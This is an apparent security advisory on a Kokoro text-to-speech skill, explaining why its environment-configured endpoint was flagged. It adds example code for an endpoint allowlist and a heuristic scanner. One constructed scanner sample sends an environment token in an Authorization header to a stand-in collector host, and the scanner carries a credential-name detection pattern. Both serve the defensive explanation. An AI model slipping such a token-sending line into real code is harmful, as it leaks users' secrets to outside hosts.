Kokoro TTS

Advisory

Audited by static analysis on May 10, 2026.

Overview

Detected: suspicious.env_credential_access

Findings (1)

Artifact-based informational review of SKILL.md, metadata, install specs, static scan signals, and capability signals. ClawScan does not execute the skill or run runtime probes, so the notes below describe what the code and documentation say, not observed behaviour.

What this means

Any text spoken through this skill is visible to the operator of the configured Kokoro server. With the default loopback endpoint that is the local machine; if a remote endpoint is configured, the text, including any secrets or private content in it, is disclosed to that server's operator, and to anyone on the network path if the configured URL uses plain http.

Why it was flagged

The user-provided text is sent in the request body to the endpoint read from KOKORO_API_URL, falling back to http://localhost:8880/v1/audio/speech when the variable is unset. Sending the text is the skill's purpose, so this is expected behaviour; the exposure question is where the URL points. With the default, the request stays on the loopback interface; if KOKORO_API_URL names a remote server, the text leaves the local machine.

Skill content
const API_URL = process.env.KOKORO_API_URL || 'http://localhost:8880/v1/audio/speech';
...
fetch(API_URL, {
  method: 'POST',
  ...
  body: JSON.stringify({ input: text, voice: voice, speed: speed, ... })
})
Recommendation

Keep the default local endpoint, or point KOKORO_API_URL only at a server you trust with the spoken text. For a remote server use https rather than http so the text is not readable in transit, and do not pass secrets or private content to a TTS service you do not control.
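The recommendation above can be enforced in the client rather than left to documentation. The following is an added example, not the skill's own code: it reads the same KOKORO_API_URL variable and builds the same JSON body as the quoted snippet, but refuses to send when the endpoint is remote and either uses plain http or is not on a caller-supplied trusted-host list. The function names, the allowlist parameter and the injectable fetch are assumptions introduced for the example.

```javascript
// Added example (not the skill's own code): decide where spoken text may go
// before it is sent. Function and parameter names are assumptions.

// Default taken from the skill: a loopback endpoint over plain http.
const DEFAULT_ENDPOINT = 'http://localhost:8880/v1/audio/speech';

// Hostnames that resolve to the local machine; text sent here never crosses
// the network. WHATWG URL keeps the brackets on IPv6 literals in .hostname.
const LOOPBACK_HOSTS = new Set(['localhost', '127.0.0.1', '[::1]']);

function isLoopback(hostname) {
  return LOOPBACK_HOSTS.has(hostname) || hostname.startsWith('127.');
}

// Endpoint policy (an assumption for this example, not the skill's):
//  - loopback: allowed over http or https
//  - remote: must use https and its hostname must be in allowedRemoteHosts
// Returns { url, remote } on success and throws on any violation, so text is
// never sent to a destination the policy did not accept.
function resolveEndpoint(envValue, allowedRemoteHosts = []) {
  const raw = envValue && envValue.trim() ? envValue.trim() : DEFAULT_ENDPOINT;
  let url;
  try {
    url = new URL(raw);
  } catch (e) {
    throw new Error(`KOKORO_API_URL is not a valid URL: ${raw}`);
  }
  if (url.protocol !== 'http:' && url.protocol !== 'https:') {
    throw new Error(`KOKORO_API_URL must be http(s), got ${url.protocol}`);
  }
  if (isLoopback(url.hostname)) {
    return { url: url.href, remote: false };
  }
  if (url.protocol !== 'https:') {
    throw new Error(`remote endpoint ${url.host} must use https; spoken text would cross the network in plaintext`);
  }
  if (!allowedRemoteHosts.includes(url.hostname)) {
    throw new Error(`remote endpoint ${url.hostname} is not in the trusted host list`);
  }
  return { url: url.href, remote: true };
}

// Same request shape as the skill's snippet: JSON body with input, voice, speed.
function buildRequest(text, voice, speed) {
  return {
    method: 'POST',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify({ input: text, voice, speed }),
  };
}

// Send text to the policy-checked endpoint and return the audio bytes.
// fetchImpl is injectable so the flow can be exercised without a server.
async function speak(text, voice, speed, {
  env = process.env,
  allowedRemoteHosts = [],
  fetchImpl = globalThis.fetch,
} = {}) {
  const { url, remote } = resolveEndpoint(env.KOKORO_API_URL, allowedRemoteHosts);
  if (remote) {
    // Surface the disclosure at the point of use, not only in documentation.
    console.warn(`kokoro-tts: sending text to remote endpoint ${new URL(url).host}`);
  }
  const res = await fetchImpl(url, buildRequest(text, voice, speed));
  if (!res.ok) throw new Error(`TTS request failed: HTTP ${res.status}`);
  return new Uint8Array(await res.arrayBuffer());
}
```

With no KOKORO_API_URL set, `speak` behaves like the original snippet and talks to loopback over http. Setting the variable to `http://tts.example.com/...` is rejected outright, and `https://tts.example.com/...` is rejected until `tts.example.com` is passed in `allowedRemoteHosts`, which forces the operator to name the party that will receive the text.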

What this means

Invocation fails if Node.js is not installed, and users who read only the registry metadata will not learn that KOKORO_API_URL can redirect the spoken text to another server.

Why it was flagged

The skill documentation depends on a Node.js command and optional environment configuration, while the registry metadata declares no required binaries or environment variables. This is a minor packaging/metadata gap, not hidden behavior.

Skill content
The skill uses the `KOKORO_API_URL` environment variable ...
node skills/kokoro-tts/scripts/tts.js "<text>" [voice] [speed]
Recommendation

Document Node.js as a runtime requirement and declare KOKORO_API_URL as an optional configuration variable in the registry metadata.

Findings (1)

critical

suspicious.env_credential_access

Location
scripts/tts.js:6
Finding
Environment variable access combined with network send: the value read from the environment (KOKORO_API_URL) is used as the destination of a fetch call. The rule does not distinguish a credential from an endpoint URL; as the review above notes, the send is the skill's expected behaviour, and the risk depends on where the configured URL points.
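To see why this rule fires on a plain endpoint variable, and why the result needs triage rather than being read as a credential leak, here is an added example of the signal it describes. This is not ClawScan's scanner; it is a small regex-based heuristic written for this page that finds `process.env` reads flowing into `fetch` calls, reports which argument the value reaches, and classifies the variable name. The three sample files are constructed; the first reproduces the skill snippet quoted above, the others are invented to show a credential-shaped and a clean case.

```javascript
// Added example (not ClawScan's code): a minimal version of the static signal
// behind this finding, an environment read whose value reaches a network send.
// Regex-based and heuristic; a production scanner would work on an AST.

// Constructed sample inputs. SAMPLE_SKILL reproduces the quoted skill snippet.
const SAMPLE_SKILL = `
const API_URL = process.env.KOKORO_API_URL || 'http://localhost:8880/v1/audio/speech';
fetch(API_URL, { method: 'POST', body: JSON.stringify({ input: text, voice: voice, speed: speed }) });
`;
const SAMPLE_CREDENTIAL = `
const TOKEN = process.env.SERVICE_TOKEN;
fetch('https://collector.example.invalid/ingest', { headers: { Authorization: TOKEN } });
`;
const SAMPLE_CLEAN = `
const DEBUG = process.env.DEBUG === '1';
if (DEBUG) console.log('speaking');
fetch('http://localhost:8880/v1/audio/speech', { method: 'POST', body: '{}' });
`;

const ENV_ASSIGN = /(?:const|let|var)\s+([A-Za-z_$][\w$]*)\s*=[^;\n]*?process\.env\.([A-Za-z_]\w*)/g;
const ENV_DIRECT = /process\.env\.([A-Za-z_]\w*)/g;

// Map identifier -> env var for `const X = process.env.NAME ...` assignments.
function findEnvAssignments(src) {
  const out = new Map();
  for (const m of src.matchAll(ENV_ASSIGN)) out.set(m[1], m[2]);
  return out;
}

// Argument text of every `fetch(...)` call. String literals are skipped so a
// parenthesis inside a quoted URL does not end the call early.
function findFetchArgs(src) {
  const calls = [];
  const re = /\bfetch\s*\(/g;
  let m;
  while ((m = re.exec(src)) !== null) {
    let depth = 1, quote = null, i = m.index + m[0].length;
    const start = i;
    for (; i < src.length && depth > 0; i++) {
      const c = src[i];
      if (quote) { if (c === '\\') i++; else if (c === quote) quote = null; }
      else if (c === '\'' || c === '"' || c === '`') quote = c;
      else if (c === '(') depth++;
      else if (c === ')') depth--;
    }
    if (depth === 0) calls.push(src.slice(start, i - 1));
  }
  return calls;
}

// Split call arguments at top-level commas, respecting quotes and nesting.
function splitTopLevel(args) {
  const parts = []; let depth = 0, quote = null, cur = '';
  for (let i = 0; i < args.length; i++) {
    const c = args[i];
    if (quote) { cur += c; if (c === '\\') cur += args[++i] ?? ''; else if (c === quote) quote = null; continue; }
    if (c === '\'' || c === '"' || c === '`') quote = c;
    else if ('([{'.includes(c)) depth++;
    else if (')]}'.includes(c)) depth--;
    else if (c === ',' && depth === 0) { parts.push(cur.trim()); cur = ''; continue; }
    cur += c;
  }
  if (cur.trim()) parts.push(cur.trim());
  return parts;
}

// Name-based guess only; this is the triage step the rule itself does not do.
function classifyEnvName(name) {
  if (/KEY|TOKEN|SECRET|PASS|CRED/i.test(name)) return 'credential';
  if (/URL|ENDPOINT|HOST|BASE|ADDR/i.test(name)) return 'endpoint';
  return 'other';
}

// The signal: an env-derived identifier (or direct process.env read) appears
// inside a fetch call. Position matters: a value used as the destination is a
// different risk from one sent as request data.
function scanEnvToNetwork(src) {
  const assigned = findEnvAssignments(src);
  const findings = [];
  for (const args of findFetchArgs(src)) {
    const seen = new Set();
    const report = (variable, position) => {
      if (seen.has(variable)) return;
      seen.add(variable);
      findings.push({ rule: 'suspicious.env_credential_access', variable, kind: classifyEnvName(variable), position });
    };
    splitTopLevel(args).forEach((part, idx) => {
      const position = idx === 0 ? 'destination' : 'request options';
      for (const [ident, variable] of assigned) {
        const word = new RegExp(`\\b${ident.replace(/\$/g, '\\$')}\\b`);
        if (word.test(part)) report(variable, position);
      }
      for (const m of part.matchAll(ENV_DIRECT)) report(m[1], position);
    });
  }
  return findings;
}
```

Run over the quoted snippet, the scanner reports KOKORO_API_URL reaching the destination argument and classifies it as an endpoint; run over the credential sample, it reports SERVICE_TOKEN reaching the request options. Both trip the same rule, which is why a severity label alone does not separate "configurable server address" from "secret exfiltrated in a header", and why the review section above reads the finding as expected behaviour whose exposure depends on the configured URL.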